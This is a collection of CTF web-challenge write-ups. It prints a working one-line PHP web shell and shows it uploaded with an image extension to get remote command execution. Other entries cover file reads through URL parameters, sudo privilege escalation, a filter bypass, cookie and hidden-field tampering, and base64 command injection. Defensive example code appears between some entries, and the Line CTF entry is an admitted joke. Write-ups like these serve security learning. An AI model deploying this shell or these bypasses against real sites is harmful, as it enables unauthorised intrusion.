UMassCTF ’21: Web: Hermit – Part 1

This is for the UMassCTF ’21 CTF.

Challenge Author: Cobchise#6969

For this challenge, we are provided the following information:

Here is the hint:

Going to the provided link, we get this page:

A quick test image upload shows me how it works:

It uploads the file and gives a link to view it. When I click the link, it essentially prints the contents of the file as if it were text:

This tells me that I need to upload a PHP shell script:

I grab my favorite one-line PHP shell and upload it as a .php file:

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

Okay, that didn’t work, so I change the extension to .jpg.

It took it:

When I click to see the “image” I get this:

Now I provide some commands as the expected “cmd” argument:

http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=pwd

Beautiful! I have a working shell. After some poking around, I find the flag:

http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=ls%20../../../home/hermit/flag
http://104.197.195.221:8086/show.php?filename=hh1PaP&cmd=cat%20../../../home/hermit/flag/userflag.txt
UMASS{a_picture_paints_a_thousand_shells}
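The upload form accepted the PHP file as soon as the extension said .jpg, and show.php then executed it. An added example, not code from the challenge: the checks an upload handler should run before storing a file (extension allowlist, image magic bytes, scan for a PHP open tag), with constructed sample blobs. Even a file that passes must be served as static content, never passed to include().

```python
import re
from pathlib import PurePosixPath

# Magic bytes for the image types the upload form is meant to accept.
IMAGE_SIGNATURES = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def check_upload(filename: str, data: bytes) -> list[str]:
    """Return the reasons an upload should be rejected (empty list = accept).

    Checks run cheapest first: extension allowlist, then magic bytes, then a
    scan for an embedded PHP open tag. Passing all three still does not make
    the file safe to include(); store it outside the web root and serve it
    with an image Content-Type only.
    """
    problems = []
    ext = PurePosixPath(filename).suffix.lower()
    sigs = IMAGE_SIGNATURES.get(ext)
    if sigs is None:
        problems.append(f"extension {ext or '(none)'} not in allowlist")
        return problems
    if not any(data.startswith(s) for s in sigs):
        problems.append(f"content does not start with a {ext} signature")
    if PHP_TAG.search(data):
        problems.append("PHP open tag found inside image data")
    return problems


# Constructed samples (hypothetical, not files from the challenge): a minimal
# JPEG, a text file carrying a PHP tag, and a JPEG with a tag appended.
GOOD_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16 + b"\xff\xd9"
FAKE_JPG = b"<?php echo 'not an image'; ?>"
POLYGLOT = GOOD_JPEG + b"<?php echo 'trailer'; ?>"

if __name__ == "__main__":
    for name, blob in [("photo.jpg", GOOD_JPEG), ("shell.php", FAKE_JPG),
                       ("shell.jpg", FAKE_JPG), ("poly.jpg", POLYGLOT)]:
        print(name, check_upload(name, blob) or "accepted")
```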

UMassCTF ’21: Web: Hermit – Part 2

This is for the UMassCTF ’21 CTF.

Challenge Author: Cobchise#6969

For this challenge, we are provided the following information:

Hint 1:

Hint 2:

Going to the provided link in my browser, I get an invalid response error:

I then decide to netcat to that port to see what I can get:

Ahh, this is an SSH port.

Thinking back to the previous Hermit challenge, I notice this is the same IP, just a different port.

I go back to my one-line PHP shell that I uploaded and poke around some more.

I decide to run whoami to see what user I am:

Now I check sudo -l to see what hermit can do:

Ahh, that looks interesting. I run that command:

That made it easy!

UMASS{a_test_of_integrity}

Line CTF: Web: Welcome

This is for the 2021 Line CTF.

For this challenge, we are given the following link and information:

The link: https://linectf.me/2e5ef7f070966b1a50e811692bf1d362

Being cautious, I check out what appears to be a hex string in the link:

2e5ef7f070966b1a50e811692bf1d362

Thinking this could be an MD5 hash, I run hashid:

This confirmed my suspicions. Now I run hashcat on the hash with the popular rockyou wordlist:

After about 16 hours, the wordlist was exhausted and I still didn’t have an answer.

I then paid a Russian hacker to get the flag for me. We settled on a nominal $9,000 USD service fee.

actual photo

Unfortunately, he wasn’t able to get the flag for me and I wasn’t able to get my money back.

I then broke out my Ouija board and attempted to contact the spirits for help:

To my surprise, the spirits were very active and willing to help point me in the right direction.

They pointed me to the letters:

L I T T L E E A R L

Combining the letters, I got “LITTLEEARL”, which I refined to “Little Earl”.

This made me think for a while and I realized they were trying to get me to remember that my long-lost 4th great cousin Earl, who was very small (only 2’3″), used to rave about his favorite website: tinyurl.com

I know that TinyURL is great for shortening long URLs to make it easier to hide links to flags or other information. The problem was I needed the rest of the URL to get to what I needed.

After looking through the Line corporate website (the purveyors of the CTF), I found some interesting information on this page: https://careers.linecorp.com/

I realized that the following letters and numbers were used more than any other letters and numbers on the page, and they ranked in the following order (I repeated letters based on whimsy):

P A S S W O R D S G E N E R A T O R N E T

I realized this was a website! https://passwordgenerator.net

I went to that website and set the parameters on the page to what I would expect to see for the unique ID of a TinyURL link (combination of 8 numbers and lowercase letters):

I added the generated password to the TinyURL link that Cousin Earl loved and came up with this:

https://tinyurl.com/2hp3hf84

Browsing to the URL, I am directed to a GitHub repo (https://github.com/GMKdotUS/unwelcomeLineCTF):

Clicking the only file in the repo, I see a hint:

It took me a while, but I realized this was a Back to the Future reference… Time Travel!

I saw that this file had been edited so I looked at the previous file version to see if it had any information… like going back in time:

I see that the file originally contained a link!

https://linectf.me/2e5ef7f070966b1a50e811692bf1d362

At this point, I realize I should wget the link to see what it contains:

wget https://linectf.me/2e5ef7f070966b1a50e811692bf1d362

I performed the strings command on the downloaded file to see if there is anything interesting:

This resulted in a lot of cryptic, code-looking strings, so I piped the output to grep, looking for the flag as follows:

strings 2e5ef7f070966b1a50e811692bf1d362 | grep LINECTF

Boom! I got the flag!!!

LINECTF{welcome_to_linectf}

I later learned that I could have just clicked on the link provided in the challenge description and would have gotten the flag, as such:

In case you missed it, I was being a smartass. This was the easiest challenge I have ever seen, so I thought I would have some fun.

Vishwa CTF: Web: UwU (469)

This is from the 2021 Vishwa CTF

For this challenge, we are given a URL:

Going to the site, we are given this page:

After a little poking around, I look for a robots.txt entry:

Interesting! Now I follow the clue and look for a robots directory:

I click the link on the page for the source code and I get this:

After reviewing the code, I see that the PHP is looking for an input parameter “php_is_hard” and it runs “preg_replace()” on it and evaluates the output of that.

if (isset($_GET['php_is_hard'])) {
    $you_enter = $_GET['php_is_hard'];
    $we_enter = 'suzuki_harumiya';
    $the_final_one = preg_replace("/$we_enter/", '', $you_enter);
    if ($the_final_one === $we_enter) {
        open_up();
    }
}

Analyzing this code, I see that it takes my input and looks for all instances of “suzuki_harumiya” and removes it. Then it compares the resulting string to “suzuki_harumiya”. If it is true, then it runs the “open_up()” function.

I see that I can simply manipulate my input to “ssuzuki_harumiyauzuki_harumiya” and the script will remove the single instance of “suzuki_harumiya” in it and the resulting string will, in fact, be “suzuki_harumiya”. When I feed that input, I get this:
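The gate strips the token exactly once and then compares, which is the classic single-pass sanitizer mistake. An added example, not code from the challenge: the PHP logic modelled with re.sub, the nested payload that survives one pass, and a fixed-point version that keeps stripping until the string stops changing, which no nested payload survives. The helper names are my own; the last test shows the same nesting trick against a hypothetical "<script>" filter, so it generalizes beyond this challenge.

```python
import re

SECRET = "suzuki_harumiya"


def strip_once(s: str, token: str) -> str:
    """One non-overlapping left-to-right pass, like preg_replace("/token/", '', s)."""
    return re.sub(re.escape(token), "", s)


def strip_to_fixed_point(s: str, token: str) -> str:
    """Repeat strip_once until the output is stable.

    Removing a token can splice its neighbours into a fresh copy of the
    token; looping until nothing changes guarantees none remains.
    """
    while True:
        stripped = strip_once(s, token)
        if stripped == s:
            return s
        s = stripped


def vulnerable_gate(user_input: str) -> bool:
    """The challenge's check: strip SECRET once, then require SECRET to remain."""
    return strip_once(user_input, SECRET) == SECRET


def nested_payload(token: str) -> str:
    """Split token after its first character and wrap a full copy inside the gap."""
    return token[0] + token + token[1:]


if __name__ == "__main__":
    payload = nested_payload(SECRET)
    print(payload, "->", strip_once(payload, SECRET), "| gate opens:", vulnerable_gate(payload))
    print("fixed point:", repr(strip_to_fixed_point(payload, SECRET)))
```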

UTCTF2021: Web: Oinker (100)

This is from the UTCTF2021 CTF

Challenge Author: a1c3

For this challenge, we are given a URL:

Going to the page gives me this:

Providing some input:

And submitting it gives me this:

I noticed that the URL has a number at the end “85”. I try to manipulate that number and see what it gives me:

I see that it gives me what appears to be previous “Oinks”. I enumerate up to get this:

And that is the flag.

UTCTF2021: Web: Cutest Cookie Clicker Rip-Off (100)

This is from the UTCTF2021 CTF

Challenge Author: Aya Abdelgawad

For this challenge we are given a little hint and a URL:

It is a game with an automatic timer that counts down. You click the cookie to earn points. The high score is 1,000,000:

Given the name and theme of this game, I look to see what cookies it uses:

Neat, it stores my high score in a cookie. Let’s bake in a better score and refresh the page:

It applied my new highest score and is counting down:

When the clock runs out, it pops up with an alert containing the flag:

Vishwa CTF: Web: Redeeem (440)

This is from the 2021 Vishwa CTF

For this challenge, we are given a URL:

Going to the page, we get this:

Entering a coupon code does not appear to do anything. If we click the “BUY” button, we get this:

Inspecting the source, we see a hidden element named “current” with a value of “0”. This appears to be how my current balance is tracked.

I modify that element’s value to “7000” and then click the “BUY” button:

That gives us the flag!
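Both the high-score cookie in Cutest Cookie Clicker Rip-Off and the hidden “current” balance field in Redeeem trust a value the client holds and can edit. An added example, not code from either challenge: a score cookie carrying an HMAC so the server can tell an edited value from one it issued (the balance case is simpler still: keep it in a server-side session and never read it back from the form). SERVER_SECRET is a constructed key; the function names are my own.

```python
import hashlib
import hmac
import secrets

# Generated once at server start and never sent to the client.
SERVER_SECRET = secrets.token_bytes(32)


def sign_score(score: int, key: bytes = SERVER_SECRET) -> str:
    """Cookie value 'score.mac' with mac = HMAC-SHA256(key, decimal score)."""
    body = str(int(score)).encode()
    mac = hmac.new(key, body, hashlib.sha256).hexdigest()
    return f"{body.decode()}.{mac}"


def read_score(cookie: str, key: bytes = SERVER_SECRET):
    """Return the score if its MAC verifies under key, else None (treat as tampered)."""
    body, sep, mac = cookie.rpartition(".")
    if not sep or not body.isdigit():
        return None
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    # Constant-time compare so the check does not leak how many bytes matched.
    if not hmac.compare_digest(expected, mac):
        return None
    return int(body)


def bake_higher_score(cookie: str, new_score: int) -> str:
    """What the browser-side edit from the writeup produces: new number, old MAC."""
    _, _, mac = cookie.rpartition(".")
    return f"{int(new_score)}.{mac}"


if __name__ == "__main__":
    issued = sign_score(12)
    print("issued :", issued, "->", read_score(issued))
    edited = bake_higher_score(issued, 1_000_000)
    print("edited :", edited, "->", read_score(edited))
```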

UTCTF2021: Web: Source it!! (100)

This is from the UTCTF2021 CTF

Challenge Author: Rob H

For this challenge, we are given a little hint and a URL:

Here is the site:

I take a look at the source and find that it is doing client-side authentication in JavaScript:

I see that the password’s MD5 hash is “1bea3a3d4bc3be1149a75b33fb8d82bc”

A quick Google search for that hash shows that it has already been cracked and is “sherlock”.

I try logging in as admin with password sherlock and I’m in:

0x41414141 CTF: Register Secret PIN

This is from the 0x41414141 CTF.

When I went to register to compete in the 0x41414141 CTF, I found that it was a little different from other CTFd-based CTFs. Besides the normal registration information, it asks for a pin code (secret pin code for CTF registration).

Going back and looking through the site, I see on the About page that the secret pin code for CTF entry is hidden somewhere on the site:

After poring through the source files for each page on the site, running curl POSTs, and looking at previous versions of the site on Archive.org, I considered the steganography approach.

Besides the normal social media link images, there are only two images on the site. One is the animated Offshift logo, which yielded no obvious results when running strings, binwalk, or other stego decoders:

The second image is a small Offshift logo that is used as the header logo:

After downloading this image, I ran strings on it to look for anything interesting:

Ahh! I see “secret: 100100100101” at the bottom of the results.

I convert the binary string to decimal:

echo "obase=10; ibase=2; 100100100101" | bc

Using the resulting decimal value as the pin, I am now able to register for the CTF.

0xL4ugh CTF: Web: Sad_Agent (200)

This is from the 0xL4ugh CTF.

For this challenge we are given a mildly cryptic description:

do you know … i have secret organization called sad can’t anyone access it by any browser and you should be sad to access and decode anything in your bad life link : http://168.61.3.216/sad_agent/ author : Sad Coder

When I go to the link, I get this page:

When I click the “chek” button, I get some information…

This tells me that the browser’s user agent property is important. Referring back to the challenge text, I believe I need to change my browser’s user agent to “sad”, so I do this in Chrome’s Developer Tools…

After doing this, I click the “chek” button again and get better results. (I highlighted the black text that is over the black background).

Looking at the resulting source code, I see a strange value for a form input field.

Seeing the makeup of the value, I think it might be base64, so I decode it to…

Interesting! The page appears to take commands through this base64 encoded field. To do a POC, I encode a different command to see what it does…

I see that I get something different. Let’s go for the flag using:

show_source("index.php");

BINGO! The flag was embedded in the PHP code.

This was a fun challenge. Thank you to Sad Coder. Hopefully you can find some happiness in this writeup!